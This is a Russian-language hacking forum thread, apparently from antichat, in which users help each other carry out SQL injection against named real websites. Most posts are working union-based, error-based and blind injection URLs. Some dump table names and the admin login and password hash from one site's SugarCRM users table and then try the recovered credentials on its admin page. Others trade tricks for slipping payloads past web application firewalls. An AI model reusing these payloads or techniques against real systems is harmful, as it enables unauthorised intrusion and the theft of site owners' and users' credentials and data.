Ваши вопросы по уязвимостям.

Может быть ты имел ввиду

HTML:

union+(select+1,2,table_name,4,5+from+(information_schema.tables))

Пробуй так:

Code:

from+information_schema.`tables`

Code:

from+/*!information_schema.tables*/

И с чего ты взял, что там фильтруется именно union select information_schema.tables, а не например union select from?

Вот варианты на случай, если фильтруется union select from https://forum.antichat.ru/showpost.php?p=2289579&postcount=14623, ну и если фильтруется и то и другое.

 

Ну и from+information_schema./*!tables*/

Да и вообще, не факт что там именно на .tables реагирует.
Поэтому или ссылку кидай или потестируй на каком этапе отрубает.

 

буду использовать гугл прежде чем задавать вопросы
буду использовать гугл прежде чем задавать вопросы
буду использовать гугл прежде чем задавать вопросы
буду использовать гугл прежде чем задавать вопросы
буду использовать гугл прежде чем задавать вопросы
буду использовать гугл прежде чем задавать вопросы
буду использовать гугл прежде чем задавать вопросы

 

На локальной серваке следующие запросы вызывали ошибку:
(SELECT+1,table_name,3,4,5)from(iNformation_schema.tabl%00es)
(SELECT+1,table_name,3,4,5)from(iNformation_schema.tables)
а вот запрос
(SELECT+1,table_name,3,4,5 from iNformation_schema.tables)
прошел.

Кстати не понял почему такой запрос тоже вызвал ошибку
(SELECT+1,table_name,3,4,5+from iNformation_schema.tables)

 

Redwood, мне нужно слить определенные таблицы (например users)

 

Приветсвую господа!

Столкнулся с такой траблой, прочитал все таблицы:
http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,group_concat%28table_name%29,5,6,7,8,9+from+information_schema.tables+where+table_schema=database%28%29+--+

затем прочитал колонки:

http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,group_concat%28column_name%29,5,6,7,8,9+from+information_schema.columns+where+table_name=0x7573657273+--+

но вывести данные которые нужно не могу, выводит лишь первую колонку:

http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,id_user,5,6,7,8,9+from+users+--+

а вывести user_name,user_hash не получается никак, я так понимаю это фильтруется, пробовал юзать CHAR, HEX, не пашет ((

Посоветуйте, пожалуйста!

П.С. Друзья а как вы боретесь с хостингом SWEB.RU который мешает проверять сайты на прочность ?

 

таблиц users несколько, в той базе с которой ты работаешь в этой таблице нет колонок user_name.

http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,group_concat%28column_name%29,5,6,7,8,9+from+information_schema.columns+where+table_name=0x7573657273%20and%20table_schema=0x70726f70726f6a5f70726f70726f6a6563746f72+--+

user_name

http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,group_concat%28user_name%29,5,6,7,8,9+from+proproj_sugarcrm.users+--+

 

Логин админа
http://www.pro-projector.ru/news_N.php?id_page=13+and+1=0+%20Union%20Select%20%201,2,3,user_name,5,6,7,8,9%20from%20proproj_sugarcrm.users
Хеш пароля админа
http://www.pro-projector.ru/news_N.php?id_page=13+and+1=0+%20Union%20Select%20%201,2,3,user_hash,5,6,7,8,9%20from%20proproj_sugarcrm.users

p.s. отображаются в теге title

 

Сам не сталкивался, а каким образом это проявляется?

 

Фаервол стоит, который проверяет запросы на наличие запрещенных слов (from, information_schema и еще каких-то) и редиректит на служебную страницу с сообщением, что запрос отвергнут

 

Ну понятно, то есть какой-нибудь WAF стоит. Наверно и универсального решения тут не будет. Если это mod_security какой-нибудь, то есть пути обхода, начиная от простых вариантов типа /*!union*/ и т.д. Но если что-то более серьезное типа "Баракуды", которая специально нацелена на такого вида запросы, включая и работу с https, то тут все намного сложнее.

 

Неподходит ((
http://www.pro-projector.ru/admin/index.php
admin
1805

пробовал также +limit+1,1
snow
8500

тоже не подходит

 

ну вот живой пример:

http://www.scrz.ru/show_part.php?id=2061-999.9+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

 

Всем спасибо, фильр в итоге обошел вот так
.php?id=10+union(SELECT+1,group_CONCAt(table_name),3,4,5+from+information_schema./*!tables*/+where+table_name+like(0x257573657225))
Плюсики накидал, ибо помогло.

 

HTML:

http://www.scrz.ru/show_part.php?id=2061+and+1=0+=null=null%20union%20select+1,database%28%29,3,4,5,6,7,8,9,10,11,%2012,13,14,user%28%29,version%28%29,17,18,19,20

ну а дальше блокирует как бы сказано выше...

хм... не пойму почему... больше не где не нахожу хеши...

 

пля = \ помогите лимит подобрать = \
http://pogoda.v.ua/index.php?id=-264
Дошол до 120 и ничего = \

 

_http://pogoda.v.ua/index.php?id=-264%20Union%20Select%20%201%20,%20version%28%29%20,3,4,5
Tag title

Интересно кому?

HTML:

http://www.yadonor.ru/ru/become/calendar_day/index.php?id_4[]=20101009000000

 

No good.
site.php?orderby=-1 is true (ASC)
site.php?orderby=-2312 is true (ASC)
site.php?orderby=1 is false (no columns at all)
site.php?orderby=,1 is true (ASC)
site.php?orderby=*(IF(1=2,1,0)) is true (WTF???)

site.php?orderby=*(IF(1=1,0,0)) true again (asc)

Have no idea what to do. Any help?

 

2 grably:

http://www.scrz.ru/show_part.php?id=2061%20and%20ascii(lower(substring((select%20table_name%20from%20information_schema.tables%20limit%2017,1),1,1)))%3E1--

 

Подскажите как дальше разкручивается скуль с name_const
вот так показывает 5-ю версию
site.com/2.php?id=6+and+(1,2)in(select+*+from(select+name_const(version(),1),name_const(version(),1))as+a)&t=Community

как нужно изменить запрос чтобы вытянуть название таблиц из information_Schema.tables. Так ничего не выходит:
site.com/2.php?id=6+and+(1,2)in(select+*+from(select+name_const(table_name,1),name_const(table_name,1)+from+information_Schema.tables)as+a)&t=Community